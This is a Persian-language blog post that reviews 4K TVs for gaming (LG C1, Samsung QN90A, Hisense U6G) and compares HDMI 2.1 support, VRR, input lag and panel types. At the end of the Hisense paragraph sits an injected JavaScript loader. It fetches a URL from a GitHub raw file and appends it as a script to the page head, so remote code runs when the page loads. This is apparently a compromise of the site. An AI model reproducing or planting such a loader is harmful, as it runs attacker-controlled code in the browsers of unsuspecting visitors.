دسته‌بندی نشده

بهترین تلویزیون های 4K برای گیمینگ

بسیاری از تلویزیون های فورکی مدرن برای استفاده گیمینگ مناسب هستند و همچنین تولید کنندگان در تلاش برای ارتقا و تقویت قابلیت های بازی در تلویزیون ها می باشند. بسیاری از مدل های بالا رده دارای قابلیت هایی مانند نرخ رفرش متغیر VRR و حالت Auto Low Latency می باشد بنابراین نیاز به اتلاف وقت برای انجام تنظیمات گیمینگ نمی باشد. با ارتقا و بالا رفتن تکنولوژی در کنسول های بازی تلویزیون ها از قابلیت HDMI 2.1 پشتیبانی می کنند تا بتوانند بازی های 4K را به اسانی اجرا کنند. در این مطلب به بررسی بهترین تلویزیون های گیمینگ از برند های مختلف در دسته بندی های مختلف خواهیم پرداخت.

بهترین تلویزیون OLED برای گیمینگ

تلویزیون C1 از الجی
اندازه ها: 48″ 55″ 65″ 77″ 83″

تلویزیون C1 از ال جی بهترین محصول برای گیمینگ می باشد. این تلویزیون در دسته بندی اولد بهترین محصول محسوب می شود که می تواند بازی ها را به صورتی فوق العاده اجرا کند. این تلویزیون اولد دارای عملکرد بازی بی نظیر است و پاسخگویی سریع و عالی دارد و همچنین می تواند حرکات را به صورتی روان و واضح پخش کند. در این تلویزیون هیچگونه تاری و سایه در حرکات سریع ایجاد نخواهد شد. تلویزیون C1 دارای تاخیر ورودی بسیار پایین است بنابراین می تواند برای صحنه ها پاسخگویی سریعی را ایجاد کند بعلاوه در این تلویزیون قابلیت های گیمینگ مختلف دیگری مانند FreeSync، نرخ رفرش متغیر G-SYNC و ویژگی Game Optimizer وجود دارد که می تواند تجربه بازی را به صورتی فوق العاده ارتقا دهد. این تلویزیون ال جی دارای کیفیت تصویر عالی و کوالتی فوق العاده ای است و می تواند سطوح مشکی را با عمق زیاد و یکنواختی عالی در اتاق های تاریک پخش کند. این محصول دارای زاویه دید گسترده است بنابریان انتخابی مناسب برای انجام بازی ها با افراد مختلف می باشد. این تلویزیون دارای 4 درگاه HDMI 2.1  است بنابراین دستگاه هایی مانند XBox, X و PS5 با بازی های4K 120Hz بر روی ان پشتیبانی می شود. این محصول رنج رنگی گسترده ای را نمایش می دهد و از اخرین بازی های HDR پشتیبانی خواهد کرد. 

بهترین تلویزیون LED برای گیمینگ

تلویزیون QN90A از سامسونگ
اندازه ها:43″ 50″ 55″ 65″ 75″ 85″ 98″

تلویزیون QN90A سامسونگ بهترین محصول گیمینگ در دسته بندی LED است. این تلویزیون دارای نمایشگر QLED می باشد و با سایز های کوچکی که دارد می توان از ان به اسانی به عنوان مانیتور استفاده کرد. این تلویزیون در سایز بندی متنوعی ارائه شده است و تمامی ان ها به صورتی مشابه عمل می کنند تنها تفاوت ان ها سایز 43 اینچ است که قابلیت VRR را ندارد و به 60 هرتز محدود شده است.
این تلویزیون دارای ورودی HDMI 2.1 می باشد بنابراین می توان با استفاده از ان دستگاه هایی مانند PS5 و سری X را به تلویزیون وصل کرد. تنها نکته نا امید کننده در این تلویزیون این است که تنها یک ورودی HDMI 2.1 در ان وجود دارد. سرعت پاسخگویی این تلویزیون بسیار بالا است و تاخیر ورودی بسیار کمی دارد بنابراین حرکاتی کاملا روان و دقیق را ارائه می دهد. در این تلویزیون سامسونگ هر دو قابلبت FreeSync و G-SYNC پشتیبانی می شود. این محصول دارای قابلیت فوق العاده Mini LED local dimming  است که به تولید رنگ های مشکی عمیق کمک می کند، متاسفانه لوکال دیمینگ در حالت بازی عملکردی چندان مناسب ندارد. QN90A دارای پنل VA است اما به دلیل استفاده از قابلیت زاویه دید گسترده اختصاصی سامسونگ نسبت کنتراست ان پایین امده است و نسبت به سایر پنل های VA عملکردی ضعیف تر دارد.

بهترین تلویزیون اقتصادی برای گیمینگ

تلویزیون U6G از هایسنس
اندازه ها:50″ 55″ 65″ 75″

بهترین تلویزیون برای انجام بازی ها با قیمت مناسب از کمپانی هایسنس مدل U6G می باشد. این تلویزیون محصولی عالی از هر نظر می باشد و می تواند تصاویری عالی با کوالتی بالا را ارائه دهد. این تلویزیون قابلیت های پیشرفته ای دارد و می تواند عملکردی گیمینگ عالی را در هر دو شرایط نوری ناریک و روشن ارائه دهد. در این محصول مانند دیگر تلویزیون ها قابلیت های فراوانی پیدا نمی شود و از ویژگی هایی مانند ورودی HDMI 2.1 و نرخ رفرش متغیر برخوردار نمی باشد بنابراین به بازی های فورکی 4K 60Hz محدود می باشد. با این وجود در این تلویزیون پاسخگویی سریعی برای صحنه ها متحرک وجود دارد و همچنین تاخیر ورودی ان پایین می باشد بنابراین نویز های اضافه هنگام نمایش ان ها روی نمایشگر به چشم نمی خورد و کاملا روان و دقیق پخش می شوند. با وجود نمایش دقیق chroma 4:4:4 در سیگنال های فورکی و 1080p از این تلویزیون به اسانی می توان به عنوان مانیتور استفاده کرد. پنل U6G هایسنس VA می باشد پس نسبت کنتراست بالایی دارد و همچنین قابلیت full-array local dimming می تواند کنتراست را به صورت چشمگیری ارتقا دهد. زاویه دید این تلویزیون محدود است و کیفیت تصاویر در قسمت های حاشیه ای افت می کند. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *